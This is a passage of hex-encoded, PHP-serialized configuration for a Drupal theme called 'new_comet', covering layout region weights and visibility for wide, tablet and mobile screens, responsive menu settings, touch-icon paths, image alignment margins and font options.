6d6f62696c655f66656174757265735f776569676874223b733a323a222d37223b733a33313a22706167655f776964655f636f6e74656e745f7072656669785f776569676874223b733a323a222d36223b733a33333a22706167655f7461626c65745f636f6e74656e745f7072656669785f776569676874223b733a313a2236223b733a33333a22706167655f6d6f62696c655f636f6e74656e745f7072656669785f776569676874223b733a323a222d36223b733a32313a22706167655f776964655f6d61696e5f776569676874223b733a323a222d35223b733a32333a22706167655f7461626c65745f6d61696e5f776569676874223b733a313a2237223b733a32333a22706167655f6d6f62696c655f6d61696e5f776569676874223b733a323a222d35223b733a33313a22706167655f776964655f636f6e74656e745f7375666669785f776569676874223b733a323a222d34223b733a33333a22706167655f7461626c65745f636f6e74656e745f7375666669785f776569676874223b733a313a2238223b733a33333a22706167655f6d6f62696c655f636f6e74656e745f7375666669785f776569676874223b733a323a222d34223b733a32383a22706167655f776964655f73756266656174757265735f776569676874223b733a323a222d38223b733a33303a22706167655f7461626c65745f73756266656174757265735f776569676874223b733a313a2239223b733a33303a22706167655f6d6f62696c655f73756266656174757265735f776569676874223b733a323a222d38223b733a32333a22706167655f776964655f666f6f7465725f776569676874223b733a323a222d31223b733a32353a22706167655f7461626c65745f666f6f7465725f776569676874223b733a323a223130223b733a32353a22706167655f6d6f62696c655f666f6f7465725f776569676874223b733a323a222d31223b733a32383a22706167655f6d6f62696c655f6c6561646572626f6172645f68696465223b693a303b733a32363a22706167655f776964655f6c6561646572626f6172645f68696465223b693a303b733a32383a22706167655f7461626c65745f6c6561646572626f6172645f68696465223b693a303b733a32313a22706167655f776964655f6865616465725f68696465223b693a303b733a32333a22706167655f7461626c65745f6865616465725f68696465223b693a303b733a32333a22706167655f6d6f62696c655f6865616465725f68696465223b693a303b733a32313a22706167655f776964655f6e61766261725f68696465223b693a303b733a32333a22706167655f7461626c65745f6e61766261725f68696465223b693a303b733a32333a22706167655f6d6f62696c655f6e61766261725f68696465223b693a303b733a32363a22706167655f776964655f686967686c6967687465645f68696465223b693a303b733a32383a22706167655f7461626c65745f686967686c6967687465645f68696465223b693a303b733a32383a22706167655f6d6f62696c655f686967686c6967687465645f68696465223b693a303b733a32333a22706167655f776964655f66656174757265735f68696465223b693a303b733a32353a22706167655f7461626c65745f66656174757265735f68696465223b693a303b733a32353a22706167655f6d6f62696c655f66656174757265735f68696465223b693a303b733a32393a22706167655f776964655f636f6e74656e745f7072656669785f68696465223b693a303b733a33313a22706167655f7461626c65745f636f6e74656e745f7072656669785f68696465223b693a303b733a33313a22706167655f6d6f62696c655f636f6e74656e745f7072656669785f68696465223b693a303b733a31393a22706167655f776964655f6d61696e5f68696465223b693a303b733a32313a22706167655f7461626c65745f6d61696e5f68696465223b693a303b733a32313a22706167655f6d6f62696c655f6d61696e5f68696465223b693a303b733a32393a22706167655f776964655f636f6e74656e745f7375666669785f68696465223b693a303b733a33313a22706167655f7461626c65745f636f6e74656e745f7375666669785f68696465223b693a303b733a33313a22706167655f6d6f62696c655f636f6e74656e745f7375666669785f68696465223b693a303b733a32363a22706167655f776964655f73756266656174757265735f68696465223b693a303b733a32383a22706167655f7461626c65745f73756266656174757265735f68696465223b693a303b733a32383a22706167655f6d6f62696c655f73756266656174757265735f68696465223b693a303b733a32313a22706167655f776964655f666f6f7465725f68696465223b693a303b733a32333a22706167655f7461626c65745f666f6f7465725f68696465223b693a303b733a32333a22706167655f6d6f62696c655f666f6f7465725f68696465223b693a303b733a31343a22656e61626c655f6261636b757073223b693a303b733a32313a22726573706f6e736976655f6d656e755f626c6f636b223b733a31393a226e65775f636f6d65745f6d61696e5f6d656e75223b733a32393a22726573706f6e736976655f6d656e755f64656661756c745f7374796c65223b733a393a22736c696465646f776e223b733a33323a22726573706f6e736976655f6d656e755f726573706f6e736976655f7374796c65223b733a383a2264726f706d656e75223b733a33323a22726573706f6e736976655f6d656e755f627265616b706f696e745f67726f7570223b733a31343a2261745f636f72652e73696d706c65223b733a32363a22726573706f6e736976655f6d656e755f627265616b706f696e74223b733a33303a22616c6c20616e6420286d696e2d77696474683a2036302e30363235656d29223b733a31373a2269636f6e5f706174685f64656661756c74223b733a33303a22696d616765732f746f7563682d69636f6e732f49636f6e2d36302e706e67223b733a33353a226170706c655f746f7563685f69636f6e5f706174685f6970686f6e655f726574696e61223b733a33333a22696d616765732f746f7563682d69636f6e732f49636f6e2d36302d32782e706e67223b733a32363a226170706c655f746f7563685f69636f6e5f706174685f69706164223b733a33303a22696d616765732f746f7563682d69636f6e732f49636f6e2d37362e706e67223b733a33333a226170706c655f746f7563685f69636f6e5f706174685f697061645f726574696e61223b733a33333a22696d616765732f746f7563682d69636f6e732f49636f6e2d37362d32782e706e67223b733a33363a226170706c655f746f7563685f69636f6e5f706174685f697061645f726574696e615f3378223b733a33333a22696d616765732f746f7563682d69636f6e732f49636f6e2d36302d33782e706e67223b733a33363a226170706c655f746f7563685f69636f6e5f706174685f6368726f6d655f616e64726f6964223b733a33353a22696d616765732f746f7563682d69636f6e732f49636f6e2d313932783139322e706e67223b733a32383a226170706c655f746f7563685f69636f6e5f707265636f6d706f736564223b693a303b733a32303a2267656e6572617465645f66696c65735f70617468223b733a33373a227468656d65732f6e65775f636f6d65742f7374796c65732f6373732f67656e657261746564223b733a32303a22657874656e73696f6e735f666f726d5f6f70656e223b693a313b733a31373a226c61796f7574735f666f726d5f6f70656e223b693a303b733a32333a22627265616b706f696e745f67726f75705f696d61676573223b733a31343a2261745f636f72652e73696d706c65223b733a33383a22696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f66756c6c223b733a363a2263656e746572223b733a34303a22696d6167655f616c69676e6d656e745f61727469636c655f7461626c65745f6e6f64655f66756c6c223b733a363a2263656e746572223b733a34303a22696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f66756c6c223b733a363a2263656e746572223b733a33353a22696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f66756c6c223b733a363a2263656e746572223b733a33373a22696d6167655f616c69676e6d656e745f706167655f7461626c65745f6e6f64655f66756c6c223b733a363a2263656e746572223b733a33373a22696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f66756c6c223b733a363a2263656e746572223b733a34323a22696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f66756c6c5f746f70223b733a313a2234223b733a34343a22696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a34353a22696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f66756c6c5f626f74746f6d223b733a323a223136223b733a34333a22696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a34343a22696d6167655f616c69676e6d656e745f61727469636c655f7461626c65745f6e6f64655f66756c6c5f746f70223b733a313a2234223b733a34363a22696d6167655f616c69676e6d656e745f61727469636c655f7461626c65745f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a34373a22696d6167655f616c69676e6d656e745f61727469636c655f7461626c65745f6e6f64655f66756c6c5f626f74746f6d223b733a323a223136223b733a34353a22696d6167655f616c69676e6d656e745f61727469636c655f7461626c65745f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a34343a22696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f66756c6c5f746f70223b733a313a2234223b733a34363a22696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a34373a22696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f66756c6c5f626f74746f6d223b733a323a223132223b733a34353a22696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a33393a22696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f66756c6c5f746f70223b733a313a2234223b733a34313a22696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a34323a22696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f66756c6c5f626f74746f6d223b733a323a223136223b733a34303a22696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a34313a22696d6167655f616c69676e6d656e745f706167655f7461626c65745f6e6f64655f66756c6c5f746f70223b733a313a2234223b733a34333a22696d6167655f616c69676e6d656e745f706167655f7461626c65745f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a34343a22696d6167655f616c69676e6d656e745f706167655f7461626c65745f6e6f64655f66756c6c5f626f74746f6d223b733a323a223136223b733a34323a22696d6167655f616c69676e6d656e745f706167655f7461626c65745f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a34313a22696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f66756c6c5f746f70223b733a313a2234223b733a34333a22696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f66756c6c5f7269676874223b733a313a2230223b733a34343a22696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f66756c6c5f626f74746f6d223b733a323a223132223b733a34323a22696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f66756c6c5f6c656674223b733a313a2230223b733a34323a22696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f7265766973696f6e223b4e3b733a34343a22696d6167655f616c69676e6d656e745f61727469636c655f7461626c65745f6e6f64655f7265766973696f6e223b4e3b733a34343a22696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f7265766973696f6e223b4e3b733a33393a22696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f7265766973696f6e223b4e3b733a34313a22696d6167655f616c69676e6d656e745f706167655f7461626c65745f6e6f64655f7265766973696f6e223b4e3b733a34313a22696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f7265766973696f6e223b4e3b733a34363a22696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f7265766973696f6e5f746f70223b733a313a2230223b733a34383a22696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f7265766973696f6e5f7269676874223b733a313a2230223b733a34393a22696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f7265766973696f6e5f626f74746f6d223b733a313a2230223b733a34373a22696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f7265766973696f6e5f6c656674223b733a313a2230223b733a34383a22696d6167655f616c69676e6d656e745f61727469636c655f7461626c65745f6e6f64655f7265766973696f6e5f746f70223b733a313a2230223b733a35303a22696d6167655f616c69676e6d656e745f61727469636c655f7461626c65745f6e6f64655f7265766973696f6e5f7269676874223b733a313a2230223b733a35313a22696d6167655f616c69676e6d656e745f61727469636c655f7461626c65745f6e6f64655f7265766973696f6e5f626f74746f6d223b733a313a2230223b733a34393a22696d6167655f616c69676e6d656e745f61727469636c655f7461626c65745f6e6f64655f7265766973696f6e5f6c656674223b733a313a2230223b733a34383a22696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f7265766973696f6e5f746f70223b733a313a2230223b733a35303a22696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f7265766973696f6e5f7269676874223b733a313a2230223b733a35313a22696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f7265766973696f6e5f626f74746f6d223b733a313a2230223b733a34393a22696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f7265766973696f6e5f6c656674223b733a313a2230223b733a34333a22696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f7265766973696f6e5f746f70223b733a313a2230223b733a34353a22696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f7265766973696f6e5f7269676874223b733a313a2230223b733a34363a22696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f7265766973696f6e5f626f74746f6d223b733a313a2230223b733a34343a22696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f7265766973696f6e5f6c656674223b733a313a2230223b733a34353a22696d6167655f616c69676e6d656e745f706167655f7461626c65745f6e6f64655f7265766973696f6e5f746f70223b733a313a2230223b733a34373a22696d6167655f616c69676e6d656e745f706167655f7461626c65745f6e6f64655f7265766973696f6e5f7269676874223b733a313a2230223b733a34383a22696d6167655f616c69676e6d656e745f706167655f7461626c65745f6e6f64655f7265766973696f6e5f626f74746f6d223b733a313a2230223b733a34363a22696d6167655f616c69676e6d656e745f706167655f7461626c65745f6e6f64655f7265766973696f6e5f6c656674223b733a313a2230223b733a34353a22696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f7265766973696f6e5f746f70223b733a313a2230223b733a34373a22696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f7265766973696f6e5f7269676874223b733a313a2230223b733a34383a22696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f7265766973696f6e5f626f74746f6d223b733a313a2230223b733a34363a22696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f7265766973696f6e5f6c656674223b733a313a2230223b733a34303a22696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f746561736572223b733a353a227269676874223b733a34323a22696d6167655f616c69676e6d656e745f61727469636c655f7461626c65745f6e6f64655f746561736572223b733a353a227269676874223b733a34323a22696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f746561736572223b733a363a2263656e746572223b733a33373a22696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f746561736572223b733a353a227269676874223b733a33393a22696d6167655f616c69676e6d656e745f706167655f7461626c65745f6e6f64655f746561736572223b733a353a227269676874223b733a33393a22696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f746561736572223b733a363a2263656e746572223b733a34343a22696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f7465617365725f746f70223b733a313a2234223b733a34363a22696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a34373a22696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f7465617365725f626f74746f6d223b733a313a2238223b733a34353a22696d6167655f616c69676e6d656e745f61727469636c655f776964655f6e6f64655f7465617365725f6c656674223b733a323a223136223b733a34363a22696d6167655f616c69676e6d656e745f61727469636c655f7461626c65745f6e6f64655f7465617365725f746f70223b733a313a2234223b733a34383a22696d6167655f616c69676e6d656e745f61727469636c655f7461626c65745f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a34393a22696d6167655f616c69676e6d656e745f61727469636c655f7461626c65745f6e6f64655f7465617365725f626f74746f6d223b733a313a2238223b733a34373a22696d6167655f616c69676e6d656e745f61727469636c655f7461626c65745f6e6f64655f7465617365725f6c656674223b733a323a223136223b733a34363a22696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f7465617365725f746f70223b733a313a2234223b733a34383a22696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a34393a22696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f7465617365725f626f74746f6d223b733a323a223132223b733a34373a22696d6167655f616c69676e6d656e745f61727469636c655f6d6f62696c655f6e6f64655f7465617365725f6c656674223b733a313a2230223b733a34313a22696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f7465617365725f746f70223b733a313a2234223b733a34333a22696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a34343a22696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f7465617365725f626f74746f6d223b733a313a2238223b733a34323a22696d6167655f616c69676e6d656e745f706167655f776964655f6e6f64655f7465617365725f6c656674223b733a323a223136223b733a34333a22696d6167655f616c69676e6d656e745f706167655f7461626c65745f6e6f64655f7465617365725f746f70223b733a313a2234223b733a34353a22696d6167655f616c69676e6d656e745f706167655f7461626c65745f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a34363a22696d6167655f616c69676e6d656e745f706167655f7461626c65745f6e6f64655f7465617365725f626f74746f6d223b733a313a2238223b733a34343a22696d6167655f616c69676e6d656e745f706167655f7461626c65745f6e6f64655f7465617365725f6c656674223b733a323a223136223b733a34333a22696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f7465617365725f746f70223b733a313a2234223b733a34353a22696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f7465617365725f7269676874223b733a313a2230223b733a34363a22696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f7465617365725f626f74746f6d223b733a323a223132223b733a34343a22696d6167655f616c69676e6d656e745f706167655f6d6f62696c655f6e6f64655f7465617365725f6c656674223b733a313a2230223b733a34313a22696d6167655f616c69676e6d656e745f636f6d6d656e745f776964655f636f6d6d656e745f66756c6c223b733a353a227269676874223b733a34333a22696d6167655f616c69676e6d656e745f636f6d6d656e745f7461626c65745f636f6d6d656e745f66756c6c223b733a363a2263656e746572223b733a34333a22696d6167655f616c69676e6d656e745f636f6d6d656e745f6d6f62696c655f636f6d6d656e745f66756c6c223b733a363a2263656e746572223b733a34353a22696d6167655f616c69676e6d656e745f636f6d6d656e745f776964655f636f6d6d656e745f66756c6c5f746f70223b733a313a2234223b733a34373a22696d6167655f616c69676e6d656e745f636f6d6d656e745f776964655f636f6d6d656e745f66756c6c5f7269676874223b733a313a2230223b733a34383a22696d6167655f616c69676e6d656e745f636f6d6d656e745f776964655f636f6d6d656e745f66756c6c5f626f74746f6d223b733a313a2238223b733a34363a22696d6167655f616c69676e6d656e745f636f6d6d656e745f776964655f636f6d6d656e745f66756c6c5f6c656674223b733a323a223136223b733a34373a22696d6167655f616c69676e6d656e745f636f6d6d656e745f7461626c65745f636f6d6d656e745f66756c6c5f746f70223b733a313a2234223b733a34393a22696d6167655f616c69676e6d656e745f636f6d6d656e745f7461626c65745f636f6d6d656e745f66756c6c5f7269676874223b733a313a2230223b733a35303a22696d6167655f616c69676e6d656e745f636f6d6d656e745f7461626c65745f636f6d6d656e745f66756c6c5f626f74746f6d223b733a323a223132223b733a34383a22696d6167655f616c69676e6d656e745f636f6d6d656e745f7461626c65745f636f6d6d656e745f66756c6c5f6c656674223b733a313a2230223b733a34373a22696d6167655f616c69676e6d656e745f636f6d6d656e745f6d6f62696c655f636f6d6d656e745f66756c6c5f746f70223b733a313a2234223b733a34393a22696d6167655f616c69676e6d656e745f636f6d6d656e745f6d6f62696c655f636f6d6d656e745f66756c6c5f7269676874223b733a313a2230223b733a35303a22696d6167655f616c69676e6d656e745f636f6d6d656e745f6d6f62696c655f636f6d6d656e745f66756c6c5f626f74746f6d223b733a323a223132223b733a34383a22696d6167655f616c69676e6d656e745f636f6d6d656e745f6d6f62696c655f636f6d6d656e745f66756c6c5f6c656674223b733a313a2230223b733a34353a22696d6167655f616c69676e6d656e745f62617369635f776964655f626c6f636b5f636f6e74656e745f66756c6c223b733a343a226e6f6e65223b733a34373a22696d6167655f616c69676e6d656e745f62617369635f7461626c65745f626c6f636b5f636f6e74656e745f66756c6c223b733a343a226e6f6e65223b733a34373a22696d6167655f616c69676e6d656e745f62617369635f6d6f62696c655f626c6f636b5f636f6e74656e745f66756c6c223b733a343a226e6f6e65223b733a34393a22696d6167655f616c69676e6d656e745f62617369635f776964655f626c6f636b5f636f6e74656e745f66756c6c5f746f70223b733a313a2230223b733a35313a22696d6167655f616c69676e6d656e745f62617369635f776964655f626c6f636b5f636f6e74656e745f66756c6c5f7269676874223b733a313a2230223b733a35323a22696d6167655f616c69676e6d656e745f62617369635f776964655f626c6f636b5f636f6e74656e745f66756c6c5f626f74746f6d223b733a313a2230223b733a35303a22696d6167655f616c69676e6d656e745f62617369635f776964655f626c6f636b5f636f6e74656e745f66756c6c5f6c656674223b733a313a2230223b733a35313a22696d6167655f616c69676e6d656e745f62617369635f7461626c65745f626c6f636b5f636f6e74656e745f66756c6c5f746f70223b733a313a2230223b733a35333a22696d6167655f616c69676e6d656e745f62617369635f7461626c65745f626c6f636b5f636f6e74656e745f66756c6c5f7269676874223b733a313a2230223b733a35343a22696d6167655f616c69676e6d656e745f62617369635f7461626c65745f626c6f636b5f636f6e74656e745f66756c6c5f626f74746f6d223b733a313a2230223b733a35323a22696d6167655f616c69676e6d656e745f62617369635f7461626c65745f626c6f636b5f636f6e74656e745f66756c6c5f6c656674223b733a313a2230223b733a35313a22696d6167655f616c69676e6d656e745f62617369635f6d6f62696c655f626c6f636b5f636f6e74656e745f66756c6c5f746f70223b733a313a2230223b733a35333a22696d6167655f616c69676e6d656e745f62617369635f6d6f62696c655f626c6f636b5f636f6e74656e745f66756c6c5f7269676874223b733a313a2230223b733a35343a22696d6167655f616c69676e6d656e745f62617369635f6d6f62696c655f626c6f636b5f636f6e74656e745f66756c6c5f626f74746f6d223b733a313a2230223b733a35323a22696d6167655f616c69676e6d656e745f62617369635f6d6f62696c655f626c6f636b5f636f6e74656e745f66756c6c5f6c656674223b733a313a2230223b733a31373a22726573706f6e736976655f7461626c6573223b693a313b733a31363a2262726561646372756d625f6c6162656c223b693a303b733a31353a2262726561646372756d625f686f6d65223b693a303b733a32313a2262726561646372756d625f686f6d655f616c6f6e65223b693a313b733a32303a2262726561646372756d625f736570617261746f72223b733a303a22223b733a32323a2262726561646372756d625f6974656d5f6c656e677468223b733a323a223332223b733a32343a227365617263685f626c6f636b5f686964655f7375626d6974223b693a303b733a32393a227365617263685f626c6f636b5f706c616365686f6c6465725f74657874223b733a303a22223b733a33303a226c6f67696e5f626c6f636b5f706c616365686f6c6465725f6c6162656c73223b693a303b733a32323a22686f72697a6f6e74616c5f6c6f67696e5f626c6f636b223b693a303b733a32343a226c6f67696e5f626c6f636b5f72656d6f76655f6c696e6b73223b693a303b733a31393a22636f6d6d656e74735f686964655f7469746c65223b693a303b733a31393a2276696577735f686964655f6665656469636f6e223b693a303b733a31383a226174747269627574696f6e5f746f67676c65223b693a313b733a32313a22666f6e745f7573655f676f6f676c655f666f6e7473223b623a303b733a31363a22666f6e745f7573655f747970656b6974223b623a303b733a31323a22666f6e745f77656273616665223b733a3332393a2256657264616e612c2047656e6576612c2073616e732d73657269663b0d0a2248656c766574696361204e657565222c2048656c7665746963612c20417269616c2c2073616e732d73657269663b0d0a225365676f65205549222c205365676f652c2047656e6576612c205461686f6d612c2073616e732d73657269663b0d0a496d706163742c202248656c76657469636120496e7365726174222c2022417269616c20426c61636b222c2073616e732d73657269663b0d0a47656f726769612c2055746f7069612c2050616c6174696e6f2c202250616c6174696e6f204c696e6f74797065222c2073657269663b0d0a2254696d6573204e657720526f6d616e222c2054696d65732c2073657269663b0d0a22436f7572696572204e6577222c20436f75726965722c206d6f6e6f73706163653b0d0a73616e732d73657269663b0d0a73657269663b223b733a31313a22666f6e745f676f6f676c65223b733a303a22223b733a31323a22666f6e745f747970656b6974223b733a303a22223b733a31333a22666f6e745f66616c6c6261636b223b733a31303a2273616e735f7365726966223b733a33353a22666f6e745f6c696e655f6865696768745f6d756c7469706c6965725f64656661756c74223b733a333a22312e35223b733a33333a22666f6e745f6c696e655f6865696768745f6d756c7469706c6965725f6c61726765223b733a353a22312e313235223b733a393a22666f6e745f62617365223b733a343a226e6f6e65223b733a31373a22666f6e745f776562736166655f62617365223b733a313a2230223b733a31343a22666f6e745f73697a655f62617365223b733a303a22223b733a31393a22666f6e745f736d6f6f7468696e675f62617365223b693a303b733a31333a22666f6e745f736974656e616d65223b733a343a226e6f6e65223b733a32313a22666f6e745f776562736166655f736974656e616d65223b733a313a2230223b733a31383a22666f6e745f73697a655f736974656e616d65223b733a303a22223b733a32333a22666f6e745f736d6f6f7468696e675f736974656e616d65223b693a303b733a31353a22666f6e745f73697465736c6f67616e223b733a343a226e6f6e65223b733a32333a22666f6e745f776562736166655f73697465736c6f67616e223b733a313a2230223b733a32303a22666f6e745f73697a655f73697465736c6f67616e223b733a303a22223b733a32353a22666f6e745f736d6f6f7468696e675f73697465736c6f67616e223b693a303b733a31343a22666f6e745f706167657469746c65223b733a343a226e6f6e65223b733a32323a22666f6e745f776562736166655f706167657469746c65223b733a313a2230223b733a31393a22666f6e745f73697a655f706167657469746c65223b733a303a22223b733a32343a22666f6e745f736d6f6f7468696e675f706167657469746c65223b693a303b733a31343a22666f6e745f6e6f64657469746c65223b733a343a226e6f6e65223b733a32323a22666f6e745f776562736166655f6e6f64657469746c65223b733a313a2230223b733a31393a22666f6e745f73697a655f6e6f64657469746c65223b733a303a22223b733a32343a22666f6e745f736d6f6f7468696e675f6e6f64657469746c65223b693a303b733a32313a22666f6e745f6e6f64657469746c655f746561736572223b733a343a226e6f6e65223b733a32393a22666f6e745f776562736166655f6e6f64657469746c655f746561736572223b733a313a2230223b733a32363a22666f6e745f73697a655f6e6f64657469746c655f746561736572223b733a303a22223b733a33313a22666f6e745f736d6f6f7468696e675f6e6f64657469746c655f746561736572223b693a303b733a31373a22666f6e745f636f6d6d656e747469746c65223b733a343a226e6f6e65223b733a32353a22666f6e745f776562736166655f636f6d6d656e747469746c65223b733a313a2230223b733a32323a22666f6e745f73697a655f636f6d6d656e747469746c65223b733a303a22223b733a32373a22666f6e745f736d6f6f7468696e675f636f6d6d656e747469746c65223b693a303b733a31353a22666f6e745f626c6f636b7469746c65223b733a343a226e6f6e65223b733a32333a22666f6e745f776562736166655f626c6f636b7469746c65223b733a313a2230223b733a32303a22666f6e745f73697a655f626c6f636b7469746c65223b733a303a22223b733a32353a22666f6e745f736d6f6f7468696e675f626c6f636b7469746c65223b693a303b733a31303a22666f6e745f6c696e6b73223b733a343a226e6f6e65223b733a31383a22666f6e745f776562736166655f6c696e6b73223b733a313a2230223b733a31353a22666f6e745f73697a655f6c696e6b73223b733a303a22223b733a32303a22666f6e745f736d6f6f7468696e675f6c696e6b73223b693a303b733a31303a22666f6e745f6d656e7573223b733a343a226e6f6e65223b733a31383a22666f6e745f776562736166655f6d656e7573223b733a313a2230223b733a31353a22666f6e745f73697a655f6d656e7573223b733a303a22223b733a32303a22666f6e745f736d6f6f7468696e675f6d656e7573223b693a303b733a31393a22666f6e745f726573706f6e736976656d656e75223b733a343a226e6f6e65223b733a32373a22666f6e745f776562736166655f726573706f6e736976656d656e75223b733a313a2230223b733a32343a22666f6e745f73697a655f726573706f6e736976656d656e75223b733a303a22223b733a32393a22666f6e745f736d6f6f7468696e675f726573706f6e736976656d656e75223b693a303b733a32363a22666f6e745f726573706f6e736976656d656e755f746f67676c65223b733a343a226e6f6e65223b733a33343a22666f6e745f776562736166655f726573706f6e736976656d656e755f746f67676c65223b733a313a2230223b733a33313a22666f6e745f73697a655f726573706f6e736976656d656e755f746f67676c65223b733a303a22223b733a33363a22666f6e745f736d6f6f7468696e675f726573706f6e736976656d656e755f746f67676c65223b693a303b733a31323a22666f6e745f627574746f6e73223b733a343a226e6f6e65223b733a32303a22666f6e745f776562736166655f627574746f6e73223b733a313a2230223b733a31373a22666f6e745f73697a655f627574746f6e73223b733a303a22223b733a32323a22666f6e745f736d6f6f7468696e675f627574746f6e73223b693a303b733a31363a22666f6e745f62726561646372756d6273223b733a343a226e6f6e65223b733a32343a22666f6e745f776562736166655f62726561646372756d6273223b733a313a2230223b733a32333a22666f6e745f676f6f676c655f62726561646372756d6273223b733a303a22223b733a32313a22666f6e745f73697a655f62726561646372756d6273223b733a303a22223b733a32363a22666f6e745f736d6f6f7468696e675f62726561646372756d6273223b693a303b733a393a22666f6e745f74616273223b733a343a226e6f6e65223b733a31373a22666f6e745f776562736166655f74616273223b733a313a2230223b733a31343a22666f6e745f73697a655f74616273223b733a303a22223b733a31393a22666f6e745f736d6f6f7468696e675f74616273223b693a303b733a393a22666f6e745f68316834223b733a343a226e6f6e65223b733a31373a22666f6e745f776562736166655f68316834223b733a313a2230223b733a31393a22666f6e745f736d6f6f7468696e675f68316834223b693a303b733a393a22666f6e745f68356836223b733a343a226e6f6e65223b733a31373a22666f6e745f776562736166655f68356836223b733a313a2230223b733a31393a22666f6e745f736d6f6f7468696e675f68356836223b693a303b733a373a22666f6e745f6831223b733a343a226e6f6e65223b733a31353a22666f6e745f776562736166655f6831223b733a313a2230223b733a31323a22666f6e745f73697a655f6831223b733a303a22223b733a31373a22666f6e745f736d6f6f7468696e675f6831223b693a303b733a373a22666f6e745f6832223b733a343a226e6f6e65223b733a31353a22666f6e745f776562736166655f6832223b733a313a2230223b733a31323a22666f6e745f73697a655f6832223b733a303a22223b733a31373a22666f6e745f736d6f6f7468696e675f6832223b693a303b733a373a22666f6e745f6833223b733a343a226e6f6e65223b733a31353a22666f6e745f776562736166655f6833223b733a313a2230223b733a31323a22666f6e745f73697a655f6833223b733a303a22223b733a31373a22666f6e745f736d6f6f7468696e675f6833223b693a303b733a373a22666f6e745f6834223b733a343a226e6f6e65223b733a31353a22666f6e745f776562736166655f6834223b733a313a2230223b733a31323a22666f6e745f73697a655f6834223b733a303a22223b733a31373a22666f6e745f736d6f6f7468696e675f6834223b693a303b733a373a22666f6e745f6835223b733a343a226e6f6e65223b733a31353a22666f6e745f776562736166655f6835223b733a313a2230223b733a31323a22666f6e745f73697a655f6835223b733a303a22223b733a31373a22666f6e745f736d6f6f7468696e675f6835223b693a303b733a373a22666f6e745f6836223b733a343a226e6f6e65223b733a31353a22666f6e745f776562736166655f6836223b733a313a2230223b733a31323a22666f6e745f73697a655f6836223b733a303a22223b733a31373a22666f6e745f736d6f6f7468696e675f6836223b693a303b733a32313a22666f6e745f637573746f6d5f73656c6563746f7273223b733a343a226e6f6e65223b733a32393a22666f6e745f776562736166655f637573746f6d5f73656c6563746f7273223b733a313a2230223b733a32363a22666f6e745f73697a655f637573746f6d5f73656c6563746f7273223b733a303a22223b733a33313a22666f6e745f736d6f6f746